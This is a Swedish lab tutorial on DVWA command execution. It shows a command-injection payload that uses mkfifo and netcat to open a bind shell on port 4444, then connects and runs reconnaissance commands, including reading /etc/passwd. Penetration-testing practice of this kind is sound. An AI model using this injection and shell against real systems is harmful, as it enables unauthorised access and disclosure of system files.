Command Execution Netcat

Sec24 – Command Execution – Command Execution Netcat

Av: Oscar Andersson, Sec24, 2013-05-26

OBS:  Följande guide är för utbildningssyfte enbart och får absolut inte användas för olagliga ändamål.

Denna guide utgår ifrån att du har satt upp en DVWA – Damn Vulnerable Web Application, ansluten till denna och det är även rekommenderat att du kollat igenom Command Execution Basic. Har du ingen testmiljö är det bara att följa guiden: Sätta upp en testmiljö.

När du väl är inloggad börjar du med att trycka på fliken DVWA Security. Här kan du välja vilken säkerhetsnivå hemsidan ska ha. I den här introduktionsguiden sätter vi säkerhetsnivån till low och trycker på submit.

Jag använder operativsystemet Kali och webbläsaren Iceweasel.

Kör följande kommando och klicka på submit. IP-adressen är tagen från min DVWA-server (Ubuntu).

192.168.1.57; mkfifo /tmp/pipe; sh /tmp/pipe | nc -l 4444 > /tmp/pipe

mkfifo = skapar en FIFO som heter pipe.

Pipes tillåter två olika processer att kommunicera med varandra utan de har programmerats för att jobba tillsammans. Det här gör att två processer kan ansluta till NetCat.

nc -l 4444 = gör att NetCat lyssnar och tillåter anslutningar på port 4444.

Sec24 hur hackar man DVWA penetrationstest command execution netcat 2

Om allt gått rätt till ska det se ut som ovan. NetCat lyssnar nu på porten 4444.

Starta nu upp NetCat i operativsystemet du använder. Det finns förinstallerat i BackTrack och Kali.

nc 192.168.1.57 4444 = Ansluter till DVWAs NetCat session på port 4444.

hostname = Tar fram serverns hostname.

uname -a = Listar system kernel och hur arkitekturen ser ut.

who = Visar vem som är inloggad.

whoami = Vem du är inloggad som och vilka rättigheter du har.

head -10 /etc/passwd = Visar de 10 första raderna av /etc/passwd filen.

Sec24 hur hackar man DVWA penetrationstest command execution netcat 3